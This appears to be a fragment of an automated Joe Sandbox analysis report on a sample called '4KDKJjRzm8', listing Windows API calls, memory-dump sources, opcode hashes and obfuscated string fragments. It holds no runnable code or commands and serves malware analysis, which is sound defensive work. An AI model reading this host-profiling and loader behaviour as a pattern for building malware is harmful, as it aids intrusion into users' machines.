                                                                                                                                                                                                                                                        • API String ID: 0-1027024164
                                                                                                                                                                                                                                                        • Opcode ID: c2aed33ae7494150aa606b9917873075c12b29fdae44ff55c1cf1afaa58f74b1
                                                                                                                                                                                                                                                        • Instruction ID: 30e0d42daf9ed0a419e0e4d2539d737ba017b91b4616ba6fc5908e252ae448ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2aed33ae7494150aa606b9917873075c12b29fdae44ff55c1cf1afaa58f74b1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 962125A5A153008BC7149F29CC52627B7B5EF83361F498618E4968B3A1F734CD05C7E2
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                        • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                        • Opcode ID: 30d191becb135937f8c37fe4eac9279a1ba41ac44067a6e13f3d22b0d52f04de
                                                                                                                                                                                                                                                        • Instruction ID: 061a87bd122799bbbc670c5031a957ad213bed147cacb26cca9071c3fc46b2a3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30d191becb135937f8c37fe4eac9279a1ba41ac44067a6e13f3d22b0d52f04de
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2231E3719083048BC314DF58D8D2B7FBBE8EBC5324F14892CE699872A0E7359848CB57
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                        • Opcode ID: 5f3ee4175f11f3e8265ccfb19e3e08f0ee99bb13134ce12bfe68a472fc8ae59b
                                                                                                                                                                                                                                                        • Instruction ID: 891227c69ae1b0fcbfe0e1b4f2db5630aeca7e5ede9264d36f3321af5384b1b3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f3ee4175f11f3e8265ccfb19e3e08f0ee99bb13134ce12bfe68a472fc8ae59b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2612335E083059BD7149F18C990F3FB7A6EBC4760F19892CE9858B2A1EB30DC519783
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                        • Opcode ID: 6064b4181b342ff11dab52a8d4a1984a3c00f499ae30841c1c278823d54ec5f6
                                                                                                                                                                                                                                                        • Instruction ID: 683dab8bf1dfbab64e56e9c064054ddf68c237612d1461a9e8a0cc27c24d79aa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6064b4181b342ff11dab52a8d4a1984a3c00f499ae30841c1c278823d54ec5f6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB516BF5E0C3054BD728AF28CD80A6FB7D6ABD5320F19897DE4C597391EA319C018B85
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 237503144-0
                                                                                                                                                                                                                                                        • Opcode ID: f1b0b0c65760f37ef0e18ad2b500efd35d534aa32cdf5666fe95914414987c5c
                                                                                                                                                                                                                                                        • Instruction ID: ba70e1e4ff56faaea87af9baa42d11f4fcaac82a59d7bd4d9c6c10dbcb4506f7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1b0b0c65760f37ef0e18ad2b500efd35d534aa32cdf5666fe95914414987c5c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E311FE9F002401BE505B6612C63B7F71579BD6718F0C1428F4072B383EE65F91696EB

Control-flow Graph (image not reproduced; legend: Executed / Not Executed) for the function that calls FreeLibrary and GetComputerNameExA
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 009AD898
                                                                                                                                                                                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 009ADC43
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                        • String ID: ;87>
                                                                                                                                                                                                                                                        • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                                        • Opcode ID: 40e73aa5b8c89ebf326e1ba90e90d1e4b74438a7c85017c13ef8be9d18600227
                                                                                                                                                                                                                                                        • Instruction ID: ff6988f9585629758d84509cf3b2c515f129ebe528d57f49cc858573f991b5ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40e73aa5b8c89ebf326e1ba90e90d1e4b74438a7c85017c13ef8be9d18600227
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B22128715057428FDB218F38C850B26BFF1AF57310F188A98D4D78B792D6389842D791
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000), ref: 00989D98
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000), ref: 00989E78
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                                                                                        • Opcode ID: abd6fce284455aef34ce3c019c6a47d2027d1d18a67cd1c0c743e81ca61c3632
                                                                                                                                                                                                                                                        • Instruction ID: dcc831636101aa89c5fc7accc4452a01f7221a8ae200c80f42de2af2b1289573
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: abd6fce284455aef34ce3c019c6a47d2027d1d18a67cd1c0c743e81ca61c3632
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD411274D003409FE715AF7899D2A9A7FB1EB06324F51429CE4A02F3A6C631940ACBE2
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0098F09D
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                                        • Opcode ID: d05811b688ceede7bb0a233eb49056de2b412852bd466892a570356ad570547b
                                                                                                                                                                                                                                                        • Instruction ID: 746aa37683ed9c4b6e2cd2b19e5d10eb3471cab4fe5d5c74037a1c4fb5e8cad1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d05811b688ceede7bb0a233eb49056de2b412852bd466892a570356ad570547b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA41C6B4910B40AFD370EF39994B713BEB8AB05250F504B1EF9E6866D4E331A4198BD7
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 009ADD03
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3545744682-0
                                                                                                                                                                                                                                                        • Opcode ID: f61f84a49dab927accbbcf8ff5c76477b26ab7478b4aeccd029c2b7742ef6064
                                                                                                                                                                                                                                                        • Instruction ID: bc828dc2453154bc3e211fdee9f32e68033758c932d4316204f2c088d31531fe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f61f84a49dab927accbbcf8ff5c76477b26ab7478b4aeccd029c2b7742ef6064
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD21C4705057918FD72A8F24C460732BBE2BF5B304F5885CDD4D38B692CA78A841D7A1
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000), ref: 009BE0E0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                        • Opcode ID: b57277d2b71d445d6cecea125600d38b587ca123381633e9eb45ecbc7799272c
                                                                                                                                                                                                                                                        • Instruction ID: 5756e368385be4e8249cefcb77d38ceda50867d816b17a9f7260e24d80e1663b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b57277d2b71d445d6cecea125600d38b587ca123381633e9eb45ecbc7799272c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63F0307292C211FBD2102F28BE09B973AB8AFD6730F150875F4045B165DA75E81695A1
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0098ECA3
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeSecurity
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 640775948-0
                                                                                                                                                                                                                                                        • Opcode ID: b145d59474f6909d1024996d774dc4796303d36060fe4a5d8c3b30a7663d20a4
                                                                                                                                                                                                                                                        • Instruction ID: e99bd2812a2618a513907549869e70a9e73a12ce6b2dd793c48a4fc3aecfd6a6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b145d59474f6909d1024996d774dc4796303d36060fe4a5d8c3b30a7663d20a4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BE092347EA7827AF6398614DC63F2621165B86F29E306B05B7253E3D4CFD47541414D
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                        • Opcode ID: 9d8a74f35e0f98ee20537a5bd72ace8ddd30d89838df30373d89adb4bbbe94be
                                                                                                                                                                                                                                                        • Instruction ID: 503d70c42f479e66a3c8feebc1269fb66638edce03a2aae196d2a9e5ffb4b1a8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d8a74f35e0f98ee20537a5bd72ace8ddd30d89838df30373d89adb4bbbe94be
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFF0DAB4509701CFE345DF28D1A4B1ABBF4FB88704F10884CE4968B3A0CB75AA48CF82
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                        • Opcode ID: 925d61e2580eecb29152feac56621bd1a17e75f930443d3d84412a7519f7941a
                                                                                                                                                                                                                                                        • Instruction ID: c83bc901d7ef51e4cd1be820d5312a3eb05ea9956ef613af847ed008a0e9e320
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 925d61e2580eecb29152feac56621bd1a17e75f930443d3d84412a7519f7941a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EBF07A7451C3418FD314DF24D5A8B1BBBE0BB84308F01891DE5998B390C7B59649CF82
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 00989ED2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Startup
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 724789610-0
                                                                                                                                                                                                                                                        • Opcode ID: 8b9913e1d7553690fd2bb07310dd32d4acf401ab573e812ab719cb4268f3749f
                                                                                                                                                                                                                                                        • Instruction ID: da7cd1799cb9650541055b78b128de0b714da8e0ce77e39fc1ab373414e64316
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b9913e1d7553690fd2bb07310dd32d4acf401ab573e812ab719cb4268f3749f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81E02B33A54602DBD700DB34EC57E993356DB553867068428E115C1072EA72F410EA10
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,009BE0F9), ref: 009BC590
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                                        • Opcode ID: 610f93a0d7428d9b955f56bc238a25eb5a5f22a2ce76856481d6353662835819
                                                                                                                                                                                                                                                        • Instruction ID: d6b8a8f69535dda3ac4e2c6df011cb28d52ac37385b293f60b86aa759b598048
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 610f93a0d7428d9b955f56bc238a25eb5a5f22a2ce76856481d6353662835819
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02D0C93286A222EBD6102F28BD19BC73B54EF59320F074892B4446A1B4C624EC91DAD0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000), ref: 009BC561
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                        • Opcode ID: fc62ee5ae7695b326e13cc436f1d5875b6d87d6cf964a3db2395d3cf11f1422a
                                                                                                                                                                                                                                                        • Instruction ID: 801c4e9c967d4203352558adfc234d489da37db394ad480aa4dfca8e0c84d32f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc62ee5ae7695b326e13cc436f1d5875b6d87d6cf964a3db2395d3cf11f1422a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFA001711992109ADA562B24BC09B847B21AB68621F524192E101590B68661D892AA94
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000), ref: 009DA62C
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                        • Opcode ID: c3e860435373f4728f0fde069926733aeae396c43cc39d8f24d42cf1ecce427c
                                                                                                                                                                                                                                                        • Instruction ID: c5c597b6449620ea4061074ec49d365bd9cecfeb3e836597c90abdef6dc2028f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3e860435373f4728f0fde069926733aeae396c43cc39d8f24d42cf1ecce427c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FE06571508508CBC7066F38CC4835EB6E1EF94321F258A15DA9147B98E7774D68CA46
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                        • Opcode ID: db643939ced237b7ece6bd9493061a352ee659bcb2e6badcf9e2bffa321ff082
                                                                                                                                                                                                                                                        • Instruction ID: 69d05b6f4e17ed4986759419ea0be7188c77996e9811ab902538c673ff572b54
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db643939ced237b7ece6bd9493061a352ee659bcb2e6badcf9e2bffa321ff082
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92B092F441421ACACF086F3080092EE3A70EB00302F40052DAA4146B81E236087CCA49
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009A43AA
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009A443E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                        • String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                                                                                                        • API String ID: 237503144-1429676654
                                                                                                                                                                                                                                                        • Opcode ID: 0df62c100b97aba66c0ddbb6a20786bf0f95b1bca22c38c90326b658c6ff8716
                                                                                                                                                                                                                                                        • Instruction ID: 121933d5d2106b7c2b1aefedda5c118bdd1ee4f25977a2e7be89aa0633e137ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0df62c100b97aba66c0ddbb6a20786bf0f95b1bca22c38c90326b658c6ff8716
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6C20CB560C3848AD334CF54C452B9FBAF2FBC2300F00892DD5E96B255D7B5864A9B9B
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                                                                                                                                                                                                                        • API String ID: 0-2746398225
                                                                                                                                                                                                                                                        • Opcode ID: 7f4198d7728920980c30a491aaa3d490b246bdcef760f85711725f42fac059d5
                                                                                                                                                                                                                                                        • Instruction ID: 308531b467149cbe33e0a02680b6552b494141191a7227e6b3b5aa66a9f6f979
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f4198d7728920980c30a491aaa3d490b246bdcef760f85711725f42fac059d5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 374203B2A083518FDB248F28D8917ABB7E6FFD5314F19893CD4D98B256DB349805CB42
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: @[y$HCL0$PP$hwv$\s~$mh_$z
                                                                                                                                                                                                                                                        • API String ID: 0-1160070910
                                                                                                                                                                                                                                                        • Opcode ID: 50b45d0fc6ef67f683c65db6ef547220341d6845c3be021506524db46475d9b2
                                                                                                                                                                                                                                                        • Instruction ID: c7fe6704e80ec3bd6a716da64408c10e011df5eb056ce76ac6fea438db201ece
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50b45d0fc6ef67f683c65db6ef547220341d6845c3be021506524db46475d9b2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CB218F360C2009FE704AE2DEC8567ABBE9EF94720F16463DEAC4D7744E63598018697
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: X$X$Y$Y$Z$Z$q$}
                                                                                                                                                                                                                                                        • API String ID: 0-540668698
                                                                                                                                                                                                                                                        • Opcode ID: 92023e53b11931f45d32f5ecdcf6ed19e405229557f51b4b8869f4eaeec5f576
                                                                                                                                                                                                                                                        • Instruction ID: 5c19ddc0aed927ea7e41f8c53da4b7b5357282c6bb200461b1b1dbb56d2552e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92023e53b11931f45d32f5ecdcf6ed19e405229557f51b4b8869f4eaeec5f576
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26A11B23E047E94ADF1189FC8D542EFAFA25B9A230F1D4769C4B1E73C2D5694902C761
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !Q}1$(o$/6b#$fg'$kDL$myo
                                                                                                                                                                                                                                                        • API String ID: 0-3601029264
                                                                                                                                                                                                                                                        • Opcode ID: 27b133eeaa4235933b3d00111be82d8a03fb1869732275422adb6c86283ef9f5
                                                                                                                                                                                                                                                        • Instruction ID: 6371e15f3202e7c17b5c0bdd33b964dc914619db2e47cb0652a4188ba33b69a2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27b133eeaa4235933b3d00111be82d8a03fb1869732275422adb6c86283ef9f5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0B208F360C2009FE708AE2DEC8577ABBE9EF94320F16453DE6C5C7744EA3558058696
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: U8<'$\R5$xj;$~l]R$Min
                                                                                                                                                                                                                                                        • API String ID: 0-3051850807
                                                                                                                                                                                                                                                        • Opcode ID: 2cdb46d656b0e340be9525c7d9998e008964fbf0bf9c0f7881c2ba523a22db2e
                                                                                                                                                                                                                                                        • Instruction ID: 7e1d3cf1ba94d947a149ba38ae32c52c505927e3706d699b64e70b60cd67b5fb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cdb46d656b0e340be9525c7d9998e008964fbf0bf9c0f7881c2ba523a22db2e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43B2E4F3A0C2049FE304AE2DEC8577ABBE5EF94720F1A893DE6C4C7744E63558058696
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009A84BD
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009A85B4
                                                                                                                                                                                                                                                        Strings
